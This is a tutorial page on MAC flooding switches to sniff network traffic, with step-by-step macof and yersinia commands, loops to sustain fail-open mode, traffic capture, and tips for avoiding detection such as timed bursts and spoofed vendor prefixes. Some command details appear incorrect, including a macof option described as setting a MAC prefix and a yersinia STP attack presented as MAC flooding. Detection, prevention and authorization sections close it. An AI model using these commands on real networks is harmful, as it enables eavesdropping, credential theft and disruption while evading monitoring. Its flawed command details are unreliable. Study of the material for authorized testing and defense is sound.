MAC Flooding

Understanding MAC Flooding - Overwhelming Switch Memory

What is MAC Flooding?

Simple Definition: MAC flooding is a network attack that overwhelms a switch’s memory table with fake MAC addresses, forcing the switch to stop filtering traffic and broadcast all data to every connected device, effectively turning it into a hub.

Technical Definition: MAC flooding is a Layer 2 resource exhaustion attack that floods a switch’s Content Addressable Memory (CAM) table with randomly generated MAC addresses, causing table overflow and forcing the switch into fail-open mode where it broadcasts all traffic to all ports, enabling network sniffing on switched networks.

Why MAC Flooding Works

MAC flooding succeeds due to fundamental hardware and design limitations in network switches:

  • Finite CAM Table Size: Switches have limited memory for storing MAC address mappings (typically 8,000-32,000 entries)
  • Fail-Open Design: When CAM tables overflow, many switches default to broadcasting traffic to maintain connectivity
  • No Authentication: Switches accept any MAC address without verification
  • Learning Process: Switches automatically learn and store new MAC addresses from network traffic

Attack Process Breakdown

How Switches Normally Operate

  1. MAC Learning: Switch receives frame from device on port 1
  2. CAM Table Update: Stores source MAC address and associates it with port 1
  3. Intelligent Forwarding: Future frames to that MAC only go to port 1
  4. Network Isolation: Traffic between devices remains private

What Happens During MAC Flooding

  1. Flood Initiation: Attacker sends thousands of frames with random source MAC addresses
  2. CAM Table Filling: Switch stores each fake MAC in its CAM table
  3. Memory Exhaustion: CAM table reaches maximum capacity
  4. Fail-Open Mode: Switch can’t learn new MACs, broadcasts all traffic
  5. Hub Behavior: All connected devices see all network traffic
  6. Sniffing Opportunity: Attacker can now capture all network communications

Real-World Impact

Network-Wide Eavesdropping: Once in fail-open mode, attackers can monitor all traffic on the network segment, not just their own

Credential Harvesting: Capture login credentials, session tokens, and sensitive data from all connected devices

Network Performance Degradation: Broadcasting all traffic causes significant bandwidth waste and network slowdown

WiFi Access Point Impact: Wireless access points connected to affected switches also broadcast traffic, expanding the attack surface

Compliance Violations: Unintended data exposure may violate privacy regulations and security standards

Technical Concepts

CAM Table Fundamentals

Content Addressable Memory (CAM): High-speed memory that allows switches to perform rapid MAC address lookups for forwarding decisions. Unlike regular memory that’s accessed by address, CAM is searched by content (MAC address) and returns the associated port.

Table Structure:

  • MAC Address: 48-bit hardware address
  • Port Number: Physical interface identifier
  • VLAN ID: Virtual LAN assignment
  • Timestamp: Entry age for timeout
  • Type: Dynamic (learned) or Static (configured)

Switch Learning Process

Dynamic Learning: Switches automatically learn MAC addresses by examining source addresses of incoming frames

Aging Mechanism: Entries timeout after periods of inactivity (typically 5 minutes) to accommodate network changes

Table Management: First-in-first-out (FIFO) or least-recently-used (LRU) algorithms determine which entries to remove when table approaches capacity

Fail-Open Mode Behavior

Broadcast Storm Risk: All unicast traffic becomes broadcast, dramatically increasing network load

Security Implications: Network segmentation provided by switching is completely bypassed

Recovery: Once flooding stops and entries age out, normal switching behavior gradually resumes

Technical Implementation

Prerequisites

Network Requirements:

  • Physical access to switched network segment
  • Network interface capable of generating high packet rates
  • Same broadcast domain as target systems

Essential Tools:

  • Macof: Specialized MAC flooding tool from dsniff suite
  • Yersinia: Layer 2 attack framework with flooding capabilities
  • Tcpdump: Traffic monitoring to verify fail-open state
  • Wireshark: Detailed packet analysis

Essential Command Sequence

Step 1: Network Reconnaissance 

# Identify connected network devices
nmap -sn 192.168.1.0/24
# -sn: Host discovery without port scanning
# Maps active hosts to establish baseline

# Check network interface statistics
ip -s link show eth0
# -s: Show statistics including current packet rates
# Baseline normal traffic levels before attack

# Monitor current network traffic patterns
tcpdump -i eth0 -c 100 -e
# -c 100: Capture 100 packets for baseline
# -e: Show Ethernet headers including MAC addresses
# Observe normal unicast traffic patterns

Purpose: Establish network baseline to recognize when switch enters fail-open mode. Understanding normal traffic patterns helps identify successful flooding.

Step 2: Switch Behavior Assessment 

# Test current broadcast traffic levels
tcpdump -i eth0 broadcast -c 50
# Captures broadcast frames only
# Low broadcast count indicates normal switch operation

# Verify you're on a switched network (not hub)
# Send ping to known host and monitor traffic
ping -c 3 192.168.1.100 &
tcpdump -i eth0 icmp
# Should only see your own ping, not others' traffic
# If seeing all traffic already, network uses hub or is compromised

Purpose: Confirm the network uses switches (not hubs) and establish baseline broadcast levels for comparison during attack.

Step 3: Execute MAC Flooding

Primary Tool: Macof

# Basic MAC flooding attack
macof -i eth0
# -i eth0: Interface to flood from
# Generates random MAC addresses at maximum rate
# Default: Continues until stopped with Ctrl+C

# Controlled flooding with packet count
macof -i eth0 -n 50000
# -n 50000: Send 50,000 packets then stop
# Useful for testing switch CAM table size
# Typical small switch overflow: 10,000-30,000 MACs

# Targeted flooding with specific parameters
macof -i eth0 -s 192.168.1.99 -n 10000
# -s: Specify source IP (default: random)
# Makes traffic appear from single host
# May bypass some security monitoring

Alternative Tool: Yersinia

# Interactive Yersinia interface
yersinia -I
# Navigate to: STP/CDP/DTP attacks -> MAC flooding
# Provides GUI for attack configuration

# Command-line MAC flooding
yersinia stp -attack 2
# Performs STP-based MAC flooding
# Often more effective against managed switches

Step 4: Verify Fail-Open State 

# Monitor for broadcast storm
tcpdump -i eth0 -e | grep -c "Broadcast"
# Dramatic increase in broadcast count indicates success
# Normal: <10/second, Flooding: >100/second

# Check if you can see other hosts' traffic
tcpdump -i eth0 not host $(hostname -I | awk '{print $1}')
# Filters out your own IP
# If seeing traffic between other hosts = success
# Switch is now broadcasting all frames

# Capture interesting traffic during fail-open
tcpdump -i eth0 -w mac_flood_capture.pcap
# -w: Write to file for later analysis
# Captures all visible traffic while switch is overwhelmed
# Stop with Ctrl+C when sufficient data collected

Purpose: Confirm the switch has entered fail-open mode by observing broadcast behavior and visibility of other hosts’ traffic.

Step 5: Maintaining the Attack 

# Continuous flooding to maintain fail-open state
while true; do
    macof -i eth0 -n 1000
    sleep 2  # Brief pause to avoid interface overload
done
# Sends bursts of 1000 packets every 2 seconds
# Maintains pressure on CAM table
# More stable than continuous full-rate flooding

# Monitor your interface for drops
watch -n 1 'ip -s link show eth0 | grep -A 1 "RX\|TX"'
# Updates every second
# Watch for dropped packets indicating overload
# Adjust flooding rate if drops occur

Purpose: Sustain fail-open mode while avoiding network interface overload that could disrupt the attack or cause detection.

Attack Variations

Targeted Source MAC Flooding 

# Use legitimate vendor OUIs for stealth
macof -i eth0 -s 192.168.1.50 -d 192.168.1.1 -n 10000 \
      -x 00:50:56  # VMware OUI prefix
# -x: Set source MAC prefix
# Makes fake MACs look like VMware virtual machines
# Less suspicious in virtualized environments

Distributed Flooding from Multiple Interfaces 

# If system has multiple NICs, flood from all
macof -i eth0 -n 10000 &
macof -i eth1 -n 10000 &
wait
# Doubles flooding rate
# Useful against switches with larger CAM tables

Timed Flooding Patterns 

# Flood during specific time windows
for hour in 0 8 12 17; do
    echo "Waiting for ${hour}:00..."
    while [ $(date +%H) -ne $hour ]; do sleep 60; done
    macof -i eth0 -n 30000
    sleep 3600
done
# Attacks at specific hours
# Avoids continuous flooding that triggers alerts

WiFi Access Point Considerations 

# Identify wireless access points on network
nmap -sn 192.168.1.0/24 | grep -B2 "Ubiquiti\|Cisco\|Aruba"
# Common enterprise AP manufacturers

# Monitor for wireless client traffic during flooding
tcpdump -i eth0 -e | grep -E "([0-9a-f]{2}:){5}[0-9a-f]{2}" | \
    grep -v "ff:ff:ff:ff:ff:ff"
# WiFi clients become visible when AP's switch port floods
# Exposes wireless traffic on wired network

Impact on Wireless Networks: When switches connected to wireless access points enter fail-open mode, WiFi traffic becomes visible on the wired network, breaking wireless/wired segmentation.

Common Issues and Solutions

Problem: No effect on network traffic visibility

  • Solution: Increase packet count - modern switches have larger CAM tables (try 100,000+ packets)

Problem: Network becomes completely unusable

  • Solution: Reduce flooding rate, use bursts instead of continuous flooding

Problem: Attack detected and port disabled

  • Solution: Use legitimate OUI prefixes, vary timing, reduce packet rate

Problem: Switch recovers too quickly

  • Solution: Implement continuous low-rate flooding to maintain pressure on CAM table

Detection and Prevention

Detection Indicators

  • Sudden spike in unknown MAC addresses
  • Dramatic increase in broadcast traffic
  • Switch CPU utilization spike
  • Unusual number of MAC moves between ports
  • Network performance degradation

Prevention Measures

Port Security Configuration:

  • Limit maximum MAC addresses per port
  • Enable sticky MAC learning
  • Configure violation actions (shutdown/restrict)

Dynamic Port Security:

  • Automatic learning with limits
  • Age out unused entries
  • Alert on violations

CAM Table Monitoring:

  • Set thresholds for MAC learning rates
  • Alert on rapid CAM table growth
  • Monitor for suspicious MAC patterns

Network Design:

  • Implement VLANs to limit broadcast domains
  • Use private VLANs for host isolation
  • Deploy switches with larger CAM tables

Professional Context

Legitimate Use Cases

  • Security Assessments: Testing switch security configurations and fail-open behavior
  • Network Testing: Validating switch CAM table sizes and overflow handling
  • Incident Response: Understanding attack impact during security incidents
  • Training: Demonstrating Layer 2 vulnerabilities in controlled environments

Legal and Ethical Requirements

Authorization: MAC flooding can cause severe network disruption - explicit written permission required

Scope: Define acceptable testing windows to minimize business impact

Recovery Plan: Ensure ability to restore normal network operation quickly

Documentation: Record all activities, findings, and network impact for assessment reports

MAC flooding remains an effective attack against improperly configured switches, demonstrating the importance of proper Layer 2 security controls and the risks of default switch configurations.